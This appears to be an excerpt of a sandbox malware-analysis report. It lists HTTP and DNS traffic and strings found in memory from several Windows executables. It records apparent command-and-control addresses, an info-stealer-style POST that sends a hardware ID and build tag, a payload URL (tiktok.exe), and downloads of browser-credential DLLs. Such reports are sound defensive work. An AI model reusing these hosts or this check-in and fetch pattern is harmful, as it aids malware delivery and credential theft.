Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: note.padd.cn.com
Source: global traffic	DNS traffic detected: DNS query: svc.iolo.com
Source: global traffic	DNS traffic detected: DNS query: download.iolo.net
Source: global traffic	DNS traffic detected: DNS query: westus2-2.in.applicationinsights.azure.com

Source: unknown

HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGIJJDGCBKFIDHIEBKEHost: 185.172.128.76Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 45 41 35 39 44 31 37 39 41 41 31 31 30 36 36 35 34 35 34 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 2d 2d 0d 0a Data Ascii: ------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="hwid"3DEA59D179AA1106654546------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="build"default10------HDGIJJDGCBKFIDHIEBKE--

Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp, u5c4.0.exe, 00000001.00000002.2516601507.000000002A6B1000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2500095496.00000000043A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.203/tiktok.exe
Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.203/tiktok.exe00
Source: u5c4.0.exe, 00000001.00000002.2516601507.000000002A6B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.203/tiktok.exek
Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.203/tiktok.exet-Disposition:
Source: u5c4.0.exe, 00000001.00000002.2500065620.0000000004354000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/freebl3.dll
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/freebl3.dllZ
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/mozglue.dll
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/mozglue.dllL
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/msvcp140.dll
Source: u5c4.0.exe, 00000001.00000002.2500095496.0000000004395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/nss3.dll
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/softokn3.dll
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/sqlite3.dll
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/sqlite3.dll8
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/vcruntime140.dll
Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp, u5c4.0.exe, 00000001.00000002.2500095496.000000000436A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php
Source: u5c4.0.exe, 00000001.00000002.2500095496.000000000436A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpW
Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpeb42eb8dbe78cdaae1ee01f89185a
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpt
Source: MSBuild.exe, 0000000E.00000002.2977711882.0000000002D23000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002C71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.215.85.66:9000
Source: MSBuild.exe, 0000000E.00000002.2977711882.0000000002D23000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002C71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.215.85.66:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3041772140.00000240F7AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044777911.00000240F7D50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3072206090.00000240FE6E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000074BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000074BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3041772140.00000240F7AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044777911.00000240F7D50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3072206090.00000240FE6E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3041772140.00000240F7AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044777911.00000240F7D50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3072206090.00000240FE6E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3041772140.00000240F7AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044777911.00000240F7D50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3072206090.00000240FE6E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042123428.00000240F7C70000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://compositewpf.codeplex.com/
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000074BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3041772140.00000240F7AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044777911.00000240F7D50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3072206090.00000240FE6E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000074BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3041772140.00000240F7AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044777911.00000240F7D50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3072206090.00000240FE6E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3041772140.00000240F7AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044777911.00000240F7D50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3072206090.00000240FE6E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000074BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000074BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3041772140.00000240F7AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044777911.00000240F7D50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3072206090.00000240FE6E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000074BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000074BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://dejavu.sourceforge.net
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/License
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Lic
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://download.iolo.net
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense
Source: run.exe, run.exe, 00000002.00000002.1882327714.0000000000F3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000002.00000000.1797546896.0000000000F3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000000.2066260274.0000000000F3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000002.2136653870.0000000000F3C000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnection
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://google.com
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3067902971.00000240FBD6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://microsoft.co
